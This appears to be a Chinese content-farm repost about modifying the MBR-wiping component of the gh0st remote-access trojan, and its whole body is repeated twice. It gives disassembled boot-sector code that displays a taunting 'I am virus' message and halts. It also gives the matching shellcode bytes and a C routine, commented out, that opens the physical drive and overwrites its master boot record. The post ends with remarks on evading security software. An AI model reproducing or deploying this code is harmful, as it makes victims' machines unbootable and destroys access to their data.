豪士君测试所用平台

vc修改gh0st中MBR代码，一起来看看吧，希望能帮助到您，更多请关注豪仕知识网。

被改写的MBR代码:作用是清屏并显示字符:"'I am virus! Fuck you :-)",然后进入死循环seg000:0000 mov ax, 12hseg000:0003 int 10h ; - VIDEO - SET VIDEO MODEseg000:0003 ; AL = modeseg000:0005 mov bp, 7C18h ; string start addrseg000:0008 mov cx, 18h ; string lengthseg000:000B mov ax, 1301hseg000:000E mov bx, 0Chseg000:0011 mov dx, 0E1Dhseg000:0014 int 10h ; - VIDEO - WRITE STRING (AT,XT286,PS,EGA,VGA)seg000:0014 ; AL = mode, BL = attribute if AL bit 1 clear, BH = display page numberseg000:0014 ; DH,DL = row,column of starting cursor position, CX = length of stringseg000:0014 ; ES:BP -> start of stringseg000:0014seg000:0016seg000:0016 ForeverLoop: ; CODE XREF: seg000:ForeverLoopjseg000:0016 loop ForeverLoopseg000:0016seg000:0016 ; ---------------------------------------------------------------------------seg000:0018 s_IAmVirusFuckY db 'I am virus! Fuck you :-)'seg000:0018 seg000 ends写入MBR的C代码:unsigned char scode[] ="\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c""\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72""\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";int CGh0stApp::KillMBR(){// HANDLE hDevice;// DWORD dwBytesWritten, dwBytesReturned;// BYTE pMBR[512] = {0};// // // 重新构造MBR// memcpy(pMBR, scode, sizeof(scode) - 1);// pMBR[510] = 0x55;// pMBR[511] = 0xAA;// // hDevice = CreateFile// (// "\\\\.\\PHYSICALDRIVE0",// GENERIC_READ | GENERIC_WRITE,// FILE_SHARE_READ | FILE_SHARE_WRITE,// NULL,// OPEN_EXISTING,// 0,// NULL// );// if (hDevice == INVALID_HANDLE_VALUE)// return -1;// DeviceIoControl// (// hDevice, // FSCTL_LOCK_VOLUME, // NULL, // 0, // NULL, // 0, // &dwBytesReturned, // NULL// );// // 写入病毒内容// WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);// DeviceIoControl// (// hDevice, // FSCTL_UNLOCK_VOLUME, // NULL, // 0, // NULL, // 0, // &dwBytesReturned, // NULL// );// CloseHandle(hDevice);// // ExitProcess(-1);return 0;}不过写MBR的方法很挫，会被HIPS报警，而且不能穿透还原或影子

被改写的MBR代码:作用是清屏并显示字符:"'I am virus! Fuck you :-)",然后进入死循环seg000:0000 mov ax, 12hseg000:0003 int 10h ; - VIDEO - SET VIDEO MODEseg000:0003 ; AL = modeseg000:0005 mov bp, 7C18h ; string start addrseg000:0008 mov cx, 18h ; string lengthseg000:000B mov ax, 1301hseg000:000E mov bx, 0Chseg000:0011 mov dx, 0E1Dhseg000:0014 int 10h ; - VIDEO - WRITE STRING (AT,XT286,PS,EGA,VGA)seg000:0014 ; AL = mode, BL = attribute if AL bit 1 clear, BH = display page numberseg000:0014 ; DH,DL = row,column of starting cursor position, CX = length of stringseg000:0014 ; ES:BP -> start of stringseg000:0014seg000:0016seg000:0016 ForeverLoop: ; CODE XREF: seg000:ForeverLoopjseg000:0016 loop ForeverLoopseg000:0016seg000:0016 ; ---------------------------------------------------------------------------seg000:0018 s_IAmVirusFuckY db 'I am virus! Fuck you :-)'seg000:0018 seg000 ends写入MBR的C代码:unsigned char scode[] ="\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c""\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72""\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";int CGh0stApp::KillMBR(){// HANDLE hDevice;// DWORD dwBytesWritten, dwBytesReturned;// BYTE pMBR[512] = {0};// // // 重新构造MBR// memcpy(pMBR, scode, sizeof(scode) - 1);// pMBR[510] = 0x55;// pMBR[511] = 0xAA;// // hDevice = CreateFile// (// "\\\\.\\PHYSICALDRIVE0",// GENERIC_READ | GENERIC_WRITE,// FILE_SHARE_READ | FILE_SHARE_WRITE,// NULL,// OPEN_EXISTING,// 0,// NULL// );// if (hDevice == INVALID_HANDLE_VALUE)// return -1;// DeviceIoControl// (// hDevice, // FSCTL_LOCK_VOLUME, // NULL, // 0, // NULL, // 0, // &dwBytesReturned, // NULL// );// // 写入病毒内容// WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);// DeviceIoControl// (// hDevice, // FSCTL_UNLOCK_VOLUME, // NULL, // 0, // NULL, // 0, // &dwBytesReturned, // NULL// );// CloseHandle(hDevice);// // ExitProcess(-1);return 0;}不过写MBR的方法很挫，会被HIPS报警，而且不能穿透还原或影子

以上就是vc修改gh0st中MBR代码的相关内容分享，字数约4017字，希望这对大家有所帮助！豪仕知识网往后会继续推荐vc修改gh0st中MBR代码相关内容。